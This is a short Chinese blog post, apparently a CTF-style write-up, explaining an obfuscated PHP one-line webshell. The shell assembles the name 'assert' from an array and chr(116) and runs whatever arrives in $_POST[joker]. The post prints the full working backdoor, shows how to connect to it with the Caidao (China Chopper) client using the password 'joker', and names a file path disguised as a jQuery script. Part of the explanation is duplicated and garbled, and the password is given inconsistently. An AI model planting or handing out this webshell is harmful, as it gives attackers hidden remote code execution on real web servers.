本文探讨了WebShell中的一个常见手法,通过数组$g和ASCII码对应,构造出assert函数,并结合$_POST变量形成一句话脚本。提到了利用菜刀工具进行访问的具体步骤和示例,包括ip/www/js/jquery1.42.min.php目录下的操作,以及通过http://www.xxx.com/2.php的URL进行连接,密码为joker。
$g是个数组,根据ASCll码对应表可以得到$g[1]='s',chr('116')='t',那么$gg=assert,@$gg($_POST[joker])不就是assert($_POST[joker]),组成了我们常见的一句话脚本
运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get
html路径下拿到key
<?php
error_reporting(0);
$g = array('','s');
$gg = a.$g[1].ser.chr('116');
@$gg($_POST[joker]);
?>用法: http://www.xxx.com/2.php
菜刀连接用法: http://www.xxx.com/2.php
密码:joker
详解:$g是个数组,g[1]=′s′,chr(′116′)=′t′,(https://blog.youkuaiyun.com/yabingshitech/article/details/19833217ASCll码对应表),这样的g[1]=′s′,chr(′116′)=′t′,(
最低0.47元/天 解锁文章
扫一扫
876
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
